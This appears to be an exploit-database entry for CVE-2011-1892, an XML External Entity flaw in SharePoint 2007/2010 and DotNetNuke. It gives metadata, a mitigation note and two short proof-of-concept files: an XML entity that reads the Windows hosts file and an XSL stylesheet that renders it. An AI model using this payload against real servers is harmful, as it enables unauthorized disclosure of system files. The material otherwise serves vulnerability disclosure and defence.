header-logo
Suggest Exploit
vendor:
SharePoint Server
by:
Nicolas Gregoire
5.5
CVSS
MEDIUM
File Disclosure
611
CWE
Product Name: SharePoint Server
Affected Version From: SharePoint 2007
Affected Version To: SharePoint 2010, DotNetNuke < 6
Patch Exists: NO
Related CWE: CVE-2011-1892
CPE: a:microsoft:sharepoint_server:2007
Metasploit:
Other Scripts:
Platforms Tested: Windows
2011

File disclosure via XEE in SharePoint and DotNetNuke

This exploit allows an attacker to disclose files on SharePoint 2007/2010 and DotNetNuke versions lower than 6. By exploiting an XML External Entity (XEE) vulnerability, the attacker can read arbitrary files on the system. The proof of concept (POC) files xee.xml and xee.xsl are provided.

Mitigation:

To mitigate this vulnerability, it is recommended to apply the latest patches provided by the vendors. Additionally, input validation should be implemented to prevent malicious XML parsing.
Source

Exploit-DB raw data:

Exploit Title: File disclosure via XEE in SharePoint and DotNetNuke
Date: September 15, 2011
Author: Nicolas Gregoire
Version: SharePoint 2007 / 2010, DotNetNuke < 6
CVE : CVE-2011-1892

poc filename: xee.xml

<!DOCTYPE doc [
<!ENTITY boom SYSTEM "c:\\windows\\system32\\drivers\\etc\\hosts">
]>
<doc>&boom;</doc>

poc filename: xee.xsl

<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
        <xsl:template match="/">
        <xsl:apply-templates/>
                <xsl:value-of select="doc"/>
        </xsl:template>
</xsl:stylesheet>

Navigation

Suggest Exploit

Services By CQR